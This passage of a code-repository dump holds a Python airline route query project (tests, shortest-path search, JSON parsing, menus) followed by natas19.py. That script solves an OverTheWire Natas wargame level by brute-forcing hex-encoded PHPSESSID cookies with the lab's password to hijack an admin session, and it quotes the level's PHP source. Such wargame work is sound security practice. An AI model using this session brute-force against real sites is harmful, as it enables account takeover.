k=the_query.get_accessible_list(ui_parser.code_indexed_cityList[ui_parser.searchForCode[i]])\n print k\n\n self.assertEqual(the_query.get_region(i), 2)\n\n #test advance functions\n self.assertEqual(the_query.get_average_distance(),2453)\n self.assertEqual(the_query.get_smallest_city()[0],\"UnderCity\")\n #(4000000+6000000)/2=5000000\n self.assertEqual(the_query.get_average_size(), 30002000000)\n self.assertEqual(the_query.get_continent_list(), {u'Lordaeron': [u'UnderCity', u'Dalaran']})\n self.assertEqual(the_query.get_longest_flight(),the_query.get_shortest_flight())\n self.assertEqual(the_query.get_hub_city(),[u'UnderCity', u'Dalaran'])\n\n\n ui_parser.parse(\"myData.txt\")\n the_query = Query.Query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n #no longer [u'UnderCity', u'Dalaran']\n self.assertEqual(the_query.get_hub_city(),[u'Istanbul', u'Hong Kong'])\n\n # but the biggest city is still the magic Dalaran\n self.assertEqual(the_query.get_biggest_city(),[u'Dalaran', 60000000000])\n\n # after Arthas coming\n Edit.change_population(ui_parser.code_indexed_cityList[ui_parser.searchForCode[u'Dalaran']],60)\n self.assertEqual(the_query.get_biggest_city(),[u'Tokyo', 34000000])\n\n Edit.add_route(ui_parser.code_indexed_cityList[\"PAR\"],\"CAPH\",1000000);\n self.assertEqual(ui_parser.code_indexed_cityList[\"PAR\"].accessibleList[\"CAPH\"],1000000)\n self.assertEqual(ui_parser.code_indexed_cityList[\"PAR\"].accessibleList[ui_parser.searchForCode[\"Essen\"]],433)\n\n\n\n ui_parser.save_disk(\"modifies_war.json\")\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6700507402420044,
"alphanum_fraction": 0.6707759499549866,
"avg_line_length": 64.66666412353516,
"blob_id": "eab8b78f437565b5c27f6786b75842bcf6b8bdac",
"content_id": "73ec6fc7dbff707569461a18d6563165d05c2839",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1379,
"license_type": "no_license",
"max_line_length": 908,
"num_lines": 21,
"path": "/CS242assignment2.1/tests/testforgraph.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport unittest\n\nfrom implements import MyParser, UI_interface\nimport UI_interface\n\n\nclass MyTestCase(unittest.TestCase):\n #test for the given CSAIR DATA\n #test for correct url\n def test_option2(self):\n ui_parser = MyParser.MyParser(\"myData.txt\")\n ui_parser.parse()\n tester= UI_interface.openMap(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n self.assertEqual(tester,\"http://www.gcmap.com/mapui?P=PAR-ESS,+PAR-MIL,+MIL-ESS,+MIL-IST,+MIA-WAS,+CCU-HKG,+CCU-BKK,+LIM-MEX,+LIM-BOG,+ATL-MIA,+ATL-WAS,+PEK-ICN,+LON-NYC,+LON-PAR,+LON-ESS,+IST-BGW,+LOS-FIH,+LOS-KRT,+CAI-ALG,+CAI-RUH,+CAI-BGW,+CAI-IST,+DEL-CCU,+DEL-MAA,+DEL-BOM,+BOM-MAA,+BGW-KHI,+BGW-RUH,+BGW-THR,+NYC-YYZ,+BOG-MIA,+BOG-SAO,+BOG-BUE,+SCL-LIM,+SAO-LOS,+SAO-MAD,+SFO-CHI,+JKT-SYD,+BKK-JKT,+BKK-HKG,+BKK-SGN,+KHI-DEL,+KHI-BOM,+MNL-SFO,+MNL-SGN,+MNL-SYD,+SGN-JKT,+OSA-TPE,+HKG-SHA,+HKG-TPE,+HKG-MNL,+HKG-SGN,+BUE-SAO,+TPE-MNL,+ESS-LED,+ICN-TYO,+CHI-ATL,+CHI-YYZ,+THR-KHI,+THR-RUH,+THR-DEL,+KRT-CAI,+SHA-TPE,+SHA-TYO,+SHA-ICN,+SHA-PEK,+FIH-JNB,+FIH-KRT,+WAS-NYC,+WAS-YYZ,+RUH-KHI,+TYO-OSA,+TYO-SFO,+LED-MOW,+LED-IST,+SYD-LAX,+ALG-PAR,+ALG-MAD,+ALG-IST,+MOW-THR,+MOW-IST,+MAA-CCU,+MAA-JKT,+MAA-BKK,+JNB-KRT,+LAX-SFO,+LAX-CHI,+MAD-NYC,+MAD-PAR,+MAD-LON,+MEX-MIA,+MEX-CHI,+MEX-LAX,+MEX-BOG\")\n\n #test for\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5066381096839905,
"alphanum_fraction": 0.5280513763427734,
"avg_line_length": 25.827587127685547,
"blob_id": "286bcbd1f90dd4df83e3e2153c2aed7535ffeb93",
"content_id": "e213966469e4120c20bf68adf12302117637c1e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2335,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 87,
"path": "/CS242assignment2.1/implements/Shortest_route.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport copy\n\nfrom implements import Query\n\n\n\"\"\"\na help function to print 16 cities in a line\n\"\"\"\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n\"\"\"\nfind the shortest path\n@param city_list : a code to city dictionary\n@param searchForCode: a name to code dictionary\nprint distance and the path in code\n\"\"\"\ndef findShortestRoute(city_list, searchForCode):\n \n query = Query.Query(city_list, searchForCode)\n start = \"\"\n end = \"\"\n \n print(\"City List:\")\n print_cities(query.get_all_city())\n valid_city = False\n while not valid_city:\n print(\"Select a city as the departure or press q to go back:\")\n start = raw_input()\n valid_city = start in searchForCode\n if start == \"q\":\n return\n \n valid_city = False\n while not valid_city:\n print(\"Select a city as the destination or press q to go back:\")\n end = raw_input()\n valid_city = end in searchForCode\n if start == \"q\":\n return\n start = searchForCode[start]\n end = searchForCode[end]\n\n\n dist={}\n dist[(start,start)]=0\n path={}\n for i in city_list:\n if i != start:\n dist[(start,i)]=99999999999999\n path[i]=[]\n S=[]\n path[start].append(start)\n for i in range(len(city_list)):\n temp=(99999999999999,\"\")\n for j in city_list:\n if j not in S:\n if dist[(start,j)]<temp[0]:\n temp=(dist[(start,j)],j)\n dist[(start,temp[1])] = temp[0]\n S.append(temp[1])\n #path[temp[1]].append(temp[1])\n if temp[1]!=\"\":\n for u in city_list[temp[1]].accessibleList:\n if dist[(start, u)]< (dist[(start, temp[1])] + city_list[temp[1]].accessibleList[u]):\n path[u] = path[u]\n else:\n path[u]=copy.deepcopy(path[temp[1]])\n path[u].append(u)\n dist[(start, u)] = min(dist[(start, u)], dist[(start, temp[1])] + city_list[temp[1]].accessibleList[u])\n\n\n print dist[(start, end)]\n print_cities(path[end])\n\n"
},
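Shortest_route.py above hand-rolls Dijkstra with a 99999999999999 sentinel and a manual minimum scan. For comparison, a sketch of the same algorithm over a plain adjacency dict using heapq; this is an illustrative rewrite under assumed inputs, not the repo's actual API:

    import heapq

    def shortest_path(graph, start, end):
        '''graph: {node: {neighbor: distance}}; returns (distance, path) or (inf, []).'''
        dist = {start: 0}
        prev = {}
        heap = [(0, start)]
        done = set()
        while heap:
            d, u = heapq.heappop(heap)
            if u in done:
                continue
            done.add(u)
            if u == end:
                break
            for v, w in graph.get(u, {}).items():
                if d + w < dist.get(v, float('inf')):
                    dist[v] = d + w
                    prev[v] = u
                    heapq.heappush(heap, (d + w, v))
        if end not in dist:
            return float('inf'), []
        path = [end]
        while path[-1] != start:
            path.append(prev[path[-1]])
        return dist[end], path[::-1]

    # Toy graph: A->B->C (cost 2) beats the direct A->C edge (cost 5).
    g = {'A': {'B': 1, 'C': 5}, 'B': {'C': 1}, 'C': {}}
    print(shortest_path(g, 'A', 'C'))  # (2, ['A', 'B', 'C'])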
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 21,
"blob_id": "5c4e27c7171c5fbd97be7bd87c30697fb2813cbd",
"content_id": "3ac3e7b5615e12bc2eff41db260434207028bdf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/CS242assignment2.1/implements/__init__.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n"
},
{
"alpha_fraction": 0.7140591740608215,
"alphanum_fraction": 0.7140591740608215,
"avg_line_length": 24.239999771118164,
"blob_id": "743975351be1587f6dd2aa4c3a7cdb25dfb67db0",
"content_id": "042d09af6f5740165d65da4451829d4e37e09b1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1892,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 75,
"path": "/CS242assignment2.1/implements/Edit.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport City\n\"\"\"\nremove a city and related routes\n@:param city the city you want to delete\n\"\"\"\ndef remove_city(city, city_list, searchForCode):\n city_code = searchForCode[city]\n del city_list[city_code]\n\n #city_list is the dict type (code,city)\n for i in city_list.itervalues():\n if(city_code in i.accessibleList):\n del i.accessibleList[city_code]\n\n\ndef add_city(code, name, country, continent, timezone, coordinates, population, region,code_indexed_cityList,searchForCode,link):\n city = City.City(code, name, country, continent, timezone, coordinates, population, region)\n\n\n code_indexed_cityList[city.code] = city\n\n # translate: city name->city code\n searchForCode[city.name] = code\n\n for i in link:\n city.accessibleList[i]=link[i]\n\n'''\n@param from_city the city the route start from\n@param destination_code the city code of the route's destination\n'''\ndef remove_route(from_city, destination_code):\n del from_city.accessibleList[destination_code]\n\n'''\nGiven an Airport and the route information this will add the route into\nthe network.\n@param from_city the city the route start from\n@param destination_code the city code of the route's destination\n'''\ndef add_route(from_city, destination_code, distance):\n from_city.accessibleList[destination_code] = distance\n\n'''\nThis edits the city's Country\n\n'''\ndef change_country(city, country):\n city.country = country\n\n'''\nThis edits the city's Continent\n'''\ndef change_continent(city, continent):\n city.continent = continent\n\n'''\nThis edits the Airport's Timezone\n'''\ndef change_timezone(city, timezone):\n city.timezone = timezone\n\n'''\nThis edits the Airport's Region\n'''\ndef change_region(city, region):\n city.region = region\n\n'''\nThis edits the Airport's population\n'''\ndef change_population(city, population):\n city.population = population"
},
{
"alpha_fraction": 0.5453698039054871,
"alphanum_fraction": 0.5652579069137573,
"avg_line_length": 24.33070945739746,
"blob_id": "5d5003b1486ec4dace925061ca4091e8d0f5b8bf",
"content_id": "279fa0a0e8d9d29bdb0e0e47a9a6286ce072c77c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3218,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 127,
"path": "/CS242assignment2.1/implements/AboutRoute.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport math\n\nfrom implements import Query\n\n\n\"\"\"\nprint the total distance, cost and time taken as\n@param city_list dictionary[code:city]\n@param searchForCode[city.name:code]\n\"\"\"\ndef routeInformation(city_list, searchForCode):\n query = Query.Query(city_list, searchForCode)\n\n print(\"City List:\")\n print_cities(query.get_all_city())\n valid = False\n while(not valid):\n print(\"Select a city as the departure or press q to go back:\")\n input = raw_input()\n valid = input in searchForCode\n if(input == \"q\"):\n return\n\n\n code = searchForCode[input]\n start_city = city_list[code]\n city = start_city\n airports = [code]\n legs = []\n\n while(True):\n output = \"\"\n for destination in city.accessibleList:\n output += destination + \", \"\n\n code = \"\"\n valid_code = False\n\n while(not valid_code):\n print(\"Please choose the next city or press 'return' button when you are done.\")\n print(output)\n code = raw_input()\n valid_code = (code in city.accessibleList) or (code == \"\")\n\n if(code == \"\"):\n break\n legs.append(city.accessibleList[code])\n airports.append(code)\n city = city_list[code]\n\n print(\"Total Distance = \" + str(calc_total_distance(legs)) )\n print(\"Total Cost = $\" + str(calc_total_cost(legs)))\n print(\"Total Time = \" + str(calc_total_time(legs, airports, city_list)) + \" hours\")\n\n\n\n\"\"\"\ncalculate total distance\n@param legs is a list of number which represent the distance for every leg of the journey\n\"\"\"\ndef calc_total_distance(legs):\n sum = 0\n for i in legs:\n sum += i\n return sum\n\ndef calc_total_cost(legs):\n cost = legs[0] * .35\n\n for i in range(1, len(legs)):\n temp = .35-.05*i\n if temp < 0:\n temp=0\n cost += legs[i] * temp\n\n return cost\n\n\n\"\"\"\n@param the list keeps the distance of each leg of journey\n@param airports is a list of city code on the trip\n@param city_list the code the city dictionary\n\"\"\"\ndef calc_total_time(legs, airports, city_list):\n totalTime = 0\n acceleration = 1406.25\n #750^2/2/200\n\n for i in range(len(legs)):\n if(legs[i] < 400):\n #x=0.5aT^2\n distance = legs[i]/2\n time = math.sqrt((2 * distance) / acceleration)\n totalTime += time * 2\n else:\n totalTime += math.sqrt((2 * 200) / acceleration)\n totalTime += math.sqrt((2 * 200) / acceleration)\n distance_static = legs[i] - 400\n totalTime += distance_static / 750\n #i=0 ,when #airport>2,wait\n if((i + 2) < len(airports)):\n #a outgoing plane means 10 mins off\n outbound = len(city_list[airports[i+1]].accessibleList)-1\n totalTime += 2 - outbound/6\n\n return totalTime\n\n\n\n'''\nhelper function to print a list of cities\n'''\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n"
},
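calc_total_cost in AboutRoute.py charges $0.35 per distance unit on the first leg and drops the rate by $0.05 for every later leg, never below zero. A quick worked check of that formula with invented leg lengths (max() here is equivalent to the original's clamping of temp):

    def calc_total_cost(legs):
        cost = legs[0] * .35
        for i in range(1, len(legs)):
            rate = max(.35 - .05 * i, 0)  # same clamping as the original's temp < 0 check
            cost += legs[i] * rate
        return cost

    # 100*0.35 + 200*0.30 + 300*0.25 = 35 + 60 + 75 = 170.0
    print(calc_total_cost([100, 200, 300]))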
{
"alpha_fraction": 0.5403530597686768,
"alphanum_fraction": 0.5409836173057556,
"avg_line_length": 33.11827850341797,
"blob_id": "35b050c928ce130affc19694e6d74d8bd2147b10",
"content_id": "516165c94cfce5699208fbd6e5bb8f2fa34d16a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3172,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 93,
"path": "/CS242assignment2.1/implements/MyParser.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = \"shiwei\"\n\nimport json\n\nfrom implements import City\n\n\n\"\"\"\nIt parse file to database, or save data to file\n\"\"\"\nclass MyParser():\n # @param sourcefile: the data file in json used as the source to parse\n def __init__(self, sourcefile):\n self.sourcefile = sourcefile\n self.code_indexed_cityList = {}\n self.searchForCode = {}\n \n \"\"\"\n use this function to initial the database or parse a new file\n @param when new=\"init\", it means the original state\n otherwise, new= new file name\n \"\"\"\n def parse(self,new):\n if new == \"init\":\n jsondata = json.load(open(self.sourcefile))\n else:\n jsondata = json.load(open(new))\n \n # parse through the city information\n for metro in jsondata[\"metros\"]:\n code = metro[\"code\"]\n name = metro[\"name\"]\n country = metro[\"country\"]\n continent = metro[\"continent\"]\n timezone = metro[\"timezone\"]\n coordinates = metro[\"coordinates\"]\n population = metro[\"population\"]\n region = metro[\"region\"]\n \n # Creat the city object with its own factors\n city = City.City(code, name, country, continent, timezone, coordinates, population, region)\n \n # translate: code->city object\n self.code_indexed_cityList[city.code] = city\n\n # translate: city name->city code\n self.searchForCode[city.name] = code\n \n # record the j of each route (saved as code) and use code as a index to keep distance data\n # struture: (code, distance) pair in a list\n for route in jsondata[\"routes\"]: \n departure_code = route[\"ports\"][0]\n j_code = route[\"ports\"][1]\n distance = route[\"distance\"]\n self.code_indexed_cityList[departure_code].accessibleList[j_code] = distance\n\n '''\n It will write to a file named by filename in the JSON format\n '''\n def save_disk(self,filename):\n root = {}\n metros = []\n routes = []\n \n # i in type city\n for i in self.code_indexed_cityList.itervalues():\n city_dict = {}\n city_dict[\"code\"] = i.code\n city_dict[\"name\"] = i.name\n city_dict[\"country\"] = i.country\n city_dict[\"continent\"] = i.continent\n city_dict[\"timezone\"] = i.timezone\n city_dict[\"coordinates\"] = i.coordinates\n city_dict[\"population\"] = i.population\n city_dict[\"region\"] = i.region\n \n metros.append(city_dict)\n \n # j is the target of accessibleList\n for j in i.accessibleList:\n distance = i.accessibleList[j]\n route_dic = {}\n #code\n route_dic[\"ports\"] = [i.code, j]\n route_dic[\"distance\"] = distance\n routes.append(route_dic)\n \n root[\"metros\"] = metros\n root[\"routes\"] = routes\n\n # Write the JSON output to the file\n new_file = open(filename, \"w\")\n new_file.write(json.dumps(root))"
},
{
"alpha_fraction": 0.5337874889373779,
"alphanum_fraction": 0.5409685373306274,
"avg_line_length": 33.70606994628906,
"blob_id": "9895aec6126077ca4fee8077b3e676aa822524a7",
"content_id": "d4aed7c76f05dec8b1e031d360fbd1ad1a836552",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10862,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 313,
"path": "/CS242assignment2.1/implements/UI_interface.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\nimport webbrowser\n\nfrom implements import Shortest_route, MyParser, Query, AboutRoute, Edit\n\n\n\n\n\n#initial view\n\n\"\"\"\nparse the initial document and deal with user's operation in the first view\n\"\"\"\ndef main():\n print(\"CSAir Query System\")\n print(\"edited by Wei Shi\")\n print(\"loading...\")\n\n ui_parser = MyParser.MyParser(\"myData.txt\")\n ui_parser.parse(\"init\")\n\n print(\"Start Search Now\\n\")\n\n while True:\n display_menu()\n user_input = raw_input()\n if user_input == \"1\":\n query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"2\" :\n print(\"If the system fails to open a chrome, open a browser and visit:\")\n print(openMap(ui_parser.code_indexed_cityList, ui_parser.searchForCode))\n elif user_input == \"q\" :\n break\n elif user_input == \"3\":\n edit_operation(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"4\":\n AboutRoute.routeInformation(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n elif user_input == \"5\":\n file_name = raw_input(\"Source File: \")\n ui_parser.parse(file_name)\n print(\"Done. Data parsed in.\")\n elif user_input == \"6\":\n file_name = raw_input(\"Name a new File: \")\n ui_parser.save_disk(file_name)\n print(\"Saved!\")\n elif user_input == \"7\":\n Shortest_route.findShortestRoute(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n else:\n print(\"Invalid Input, try again!\")\n\n\"\"\"\ndeal with user's operation in the edit selection view\n\"\"\"\ndef edit_operation(city_list, searchForCode):\n query = Query.Query(city_list, searchForCode)\n while(True):\n print(\"City List:\")\n print_cities(query.get_all_city())\n valid_city = False\n while(not valid_city):\n print(\"Select a city to edit or q to go back:\")\n city_name = raw_input()\n valid_city = city_name in searchForCode\n if(city_name == \"q\"):\n return \n \n city = city_list[searchForCode[city_name]]\n \n \n while(True):\n print_edit_menu()\n user_input = raw_input()\n if(user_input == \"1\"):\n Edit.remove_city(city.name, city_list, searchForCode)\n print(city.name + \" removed!\")\n # special case to break since no more actions can occur on this list\n break\n elif(user_input ==\"2\"):\n output = \"\"\n for destination in city.accessibleList:\n output += destination + \", \"\n print(\"valid destination to remove :\"+output[:-2])\n \n valid_destination = False\n while(not valid_destination):\n print(\"Select a Destination for removal\")\n destination = raw_input()\n valid_destination = destination in city.accessibleList\n \n Edit.remove_route(city, destination)\n print(\"Route Removed!\")\n elif(user_input ==\"3\"):\n destination = raw_input(\"Destination Code: \")\n distance = int(raw_input(\"Distance: \"))\n Edit.add_route(city, destination, distance)\n print(\"Route Added\")\n elif(user_input ==\"4\"):\n country = raw_input(\"New Country: \")\n Edit.change_country(city, country)\n print(\"Changed Country!\")\n elif(user_input ==\"5\"):\n continent = raw_input(\"New Continent Value: \")\n Edit.change_continent(city, continent)\n print(\"Changed Continent!\")\n elif(user_input ==\"6\"):\n timezone = int(raw_input(\"New Timezone Value: \"))\n Edit.change_timezone(city, timezone)\n print(\"Changed Timezone!\")\n elif(user_input == \"7\"):\n region = int(raw_input(\"New Region Value: \"))\n Edit.change_region(city, region)\n print(\"Changed Region!\")\n elif(user_input == \"8\"):\n population = int(raw_input(\"New Population Value: \"))\n 
Edit.change_population(city, population)\n print(\"Changed Population!\")\n elif(user_input == \"9\"):\n a=raw_input()\n b=raw_input()\n c=raw_input()\n d=raw_input()\n e=raw_input()\n f=raw_input()\n g=raw_input()\n h=raw_input()\n i=raw_input()\n\n Edit.add_city(a,b,c,d,e,f,g,h,city_list,searchForCode,i)\n elif(user_input == \"q\"):\n break\n else:\n print(\"Invalid input, try again...\")\n\n\n\"\"\"\nprint the guidance for edit\n\"\"\"\ndef print_edit_menu():\n print(\"What do you want to modify? quit by 'q' :\")\n print(\"1 - Remove City\")\n print(\"2 - Remove a Route\")\n print(\"3 - Add a Route\")\n print(\"4 - Modify Country\")\n print(\"5 - Modify Continent\")\n print(\"6 - Modify Timezone\")\n print(\"7 - Modify Region\")\n print(\"8 - Modify Population\")\n\n\n# the view for choosing city\n\n\"\"\"\ndeal with query on general infomation\n\"\"\"\ndef query(city_list, searchForCode):\n the_query = Query.Query(city_list, searchForCode)\n\n while True:\n print(\"City List:\")\n print_cities(the_query.get_all_city())\n # for i in the_query.get_all_city():\n # print i,\n print\n print(\"Type a city for querying on or q to go back, Otherwise:\")\n display_half()\n user_input = raw_input()\n if user_input == \"q\":\n return\n elif(user_input == \"a\"):\n print(\"From: \"+the_query.get_longest_flight()[0])\n print(\"To: \"+the_query.get_longest_flight()[1])\n print(\"Distance:\"+str(the_query.get_longest_flight()[2]))\n elif(user_input ==\"b\"):\n print(\"From: \"+the_query.get_shortest_flight()[0])\n print(\"To: \"+the_query.get_shortest_flight()[1])\n print(\"Distance:\"+str(the_query.get_shortest_flight()[2]))\n elif(user_input ==\"c\"):\n print(\"Average_distance :\"+str(the_query.get_average_distance()))\n elif(user_input ==\"d\"):\n print(\"Biggest_city :\"+the_query.get_biggest_city()[0])\n print(\"Population_max :\"+str(the_query.get_biggest_city()[1]))\n elif(user_input ==\"e\"):\n print(\"Smallest_city :\"+the_query.get_smallest_city()[0])\n print(\"Population_min :\"+str(the_query.get_smallest_city()[1]))\n elif(user_input ==\"f\"):\n print(\"Average_population: \"+str(the_query.get_average_size()))\n elif(user_input == \"g\"):\n temp=the_query.get_continent_list().items()\n for i in temp:\n print(i[0]+\":\")\n for j in i[1]:\n print j,\n print\n elif(user_input == \"h\"):\n for i in the_query.get_hub_city():\n print(i)\n elif user_input not in the_query.get_all_city():\n print(\"Invalid Input, try again\")\n #print(\"Select a city for querying or q to go back:\")\n query(city_list, searchForCode)\n return\n else:\n print\n display_query_doc()\n query_option(the_query,user_input,city_list,searchForCode)\n print\n\n'''\nhelper function to print a list of cities\n'''\ndef print_cities(city_list):\n cap = 16\n count = 0\n line = \"\"\n\n for city in city_list:\n line += city + \", \"\n count += 1\n if(count == cap):\n print(line)\n count = 0\n line = \"\"\n if line != \"\":\n print(line[:-2])\n\n\n\"\"\"\ndeal with query on a city\n\"\"\"\ndef query_option(the_query,city, city_list, searchForCode):\n while True:\n user_input = raw_input()\n if(user_input == \"1\"):\n print(\"City_code: \"+the_query.get_city_code(city))\n elif(user_input == \"2\"):\n print(\"Country :\"+the_query.get_country(city))\n elif(user_input == \"3\"):\n print(\"Continent :\"+the_query.get_continent(city))\n elif(user_input == \"4\"):\n print(\"Timezone :\"+str(the_query.get_timezone(city)))\n elif(user_input == \"5\"):\n print(the_query.get_coordinates(city).items()[0][0]+\": 
\"+str(the_query.get_coordinates(city).items()[0][1]))\n print(the_query.get_coordinates(city).items()[1][0]+\": \"+str(the_query.get_coordinates(city).items()[1][1]))\n elif(user_input == \"6\"):\n print(\"Population :\"+str(the_query.get_population(city)))\n elif(user_input == \"7\"):\n print(\"Region: \"+str(the_query.get_region(city)))\n elif(user_input == \"8\"):\n for i in the_query.get_accessible_list(city_list[searchForCode[city]]):\n print(\"To: \"+i[0]+\" Distance: \"+str(i[1]))\n elif(user_input == \"q\"):\n return\n else:\n print(\"Invalid Input, try again!\")\n\n\n# open the map in a chrome\ndef openMap(city_list, searchForCode):\n URL = \"http://www.gcmap.com/mapui?P=\"\n for i in city_list:\n city = city_list[i]\n departure_code = city.code\n for destination_code in city.accessibleList.keys():\n URL += (departure_code + \"-\" + destination_code + \",+\")\n\n webbrowser.open_new(URL)\n return URL\n\"\"\"\ndisplay the instruction of query\n\"\"\"\ndef display_query_doc():\n print(\"Please Select a choice or press q to quit:\")\n print(\"1 - City Code\")\n print(\"2 - Country the city belongs to \")\n print(\"3 - Continent the city belongs to \")\n print(\"4 - Timezone of the city\")\n print(\"5 - Coordinates of the city\")\n print(\"6 - Population of the city\")\n print(\"7 - Region of the city\")\n print(\"8 - Cities directly accessible from the given city\")\n\n\n\"\"\"\ndisplay the query option for general info\n\"\"\"\ndef display_half():\n print(\"a - Longest Flight Length\")\n print(\"b - Shortest Flight Length\")\n print(\"c - Average Flight Length\")\n print(\"d - Biggest City & Population\")\n print(\"e - Smallest City & Population\")\n print(\"f - Average Population Size\")\n print(\"g - List Continents with Cities\")\n print(\"h - List of Hub Cities\")\n\n\"\"\"\ndisplay the original menu\n\"\"\"\ndef display_menu():\n print(\"Send 1 or 2 to make the choice or Send q to quit:\")\n print(\"1 - Query\")\n print(\"2 - Glance at the Route Map\")\n print(\"3 - Edit the Network\")\n print(\"4 - Info about a Route\")\n print(\"5 - Parse a File and Add to the Network\")\n print(\"6 - Save Network to a File\")\n print(\"7 - shortest route search\")\n\n\n\nif __name__ == '__main__':\n main()"
}
] | 9 |
darumaseye/Natas
|
https://github.com/darumaseye/Natas
|
ac59263c8b278322d4ba5d883b52e2303e9fff59
|
cea1d19a286b9022c37c8fabdae9ed60ba511465
|
3c6f6d140bc63dfc7beeac2f0fc358a6df383c0b
|
refs/heads/master
| 2020-05-22T19:57:51.532794 | 2019-05-28T18:08:40 | 2019-05-28T18:08:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6092985272407532,
"alphanum_fraction": 0.6245241761207581,
"avg_line_length": 30.435897827148438,
"blob_id": "9bebbab48cee40dc0bfa483d8aabf08386789ae3",
"content_id": "665edbff95714118b258e711d32fed14d3923c2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3678,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 117,
"path": "/natas19.py",
"repo_name": "darumaseye/Natas",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport binascii\n\n#The script makes the first request to natas19.natas.labs.overthewire.org, using username and password;\n#\n#\n#It loops from 0 to MAX_PHPSSID (in this case 640), \n# for each loop it\n# - makes the request using the Auth field and the PHPSSID_cookie\n# - looks for \"you're an admin\" in the response body\n# - in this case break\n# - \n#Print the response of the last\n######\n### In this case the phpsessid was the string \"[num]-[user]\" coded in hex.\n### Winning string: '281-admin'\n#####\n\nlink= 'http://natas19.natas.labs.overthewire.org?debug=1'\n\nfor cookie_payload in range(0,641):\n cookie_tostring=str(cookie_payload)\n cookie_payload = binascii.hexlify(bytes(str(cookie_payload), encoding=\"ascii\"))\n cookie_jar = {'PHPSESSID':str(cookie_payload,'ascii')+'2d61646d696e'}\n print('Requesting with PHPSESSID: '+cookie_tostring+'-admin')\n req = get(link, cookies=cookie_jar, auth=HTTPBasicAuth('natas19','4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'))\n if(req.status_code==200):\n soup = BeautifulSoup(req.text, 'html.parser')\n if 'You are logged in as a regular user. Login as an admin to retrieve credentials for natas20.' in req.text:\n print('Cookie '+str(cookie_payload)+' is not a valid Admin Session')\n elif 'You are an admin. The credentials for the next level are' in req.text:\n print('Cookie '+str(cookie_payload)+' is a valid Admin Session!')\n print(soup.prettify())\n exit(0)\n else:\n print('####### Generic Error #######')\n print(soup.prettify())\n exit(1)\n else:\n print('######## HTTP ERROR: '+str(req.status_code)+'########\\nRetrying...')\n exit(1)\n\n\n\n'''\n\nCode for natas18\n$maxid = 640; // 640 should be enough for everyone\n\nfunction isValidAdminLogin() {\n if($_REQUEST[\"username\"] == \"admin\") {\n /* This method of authentication appears to be unsafe and has been disabled for now. */\n //return 1;\n }\n\n return 0;\n}\n\nfunction isValidID($id) {\n return is_numeric($id);\n}\nfunction createID($user) {\n global $maxid;\n return rand(1, $maxid);\n}\nfunction debug($msg) {\n if(array_key_exists(\"debug\", $_GET)) {\n print \"DEBUG: $msg<br>\";\n }\n}\nfunction my_session_start() {\n if(array_key_exists(\"PHPSESSID\", $_COOKIE) and isValidID($_COOKIE[\"PHPSESSID\"])) {\n if(!session_start()) {\n debug(\"Session start failed\");\n return false;\n } else {\n debug(\"Session start ok\");\n if(!array_key_exists(\"admin\", $_SESSION)) {\n debug(\"Session was old: admin flag set\");\n $_SESSION[\"admin\"] = 0; // backwards compatible, secure\n }\n return true;\n }\n }\n\n return false;\n}\nfunction print_credentials() { \n if($_SESSION and array_key_exists(\"admin\", $_SESSION) and $_SESSION[\"admin\"] == 1) {\n print \"You are an admin. The credentials for the next level are:<br>\";\n print \"<pre>Username: natas19\\n\";\n print \"Password: <censored></pre>\";\n } else {\n print \"You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.\";\n 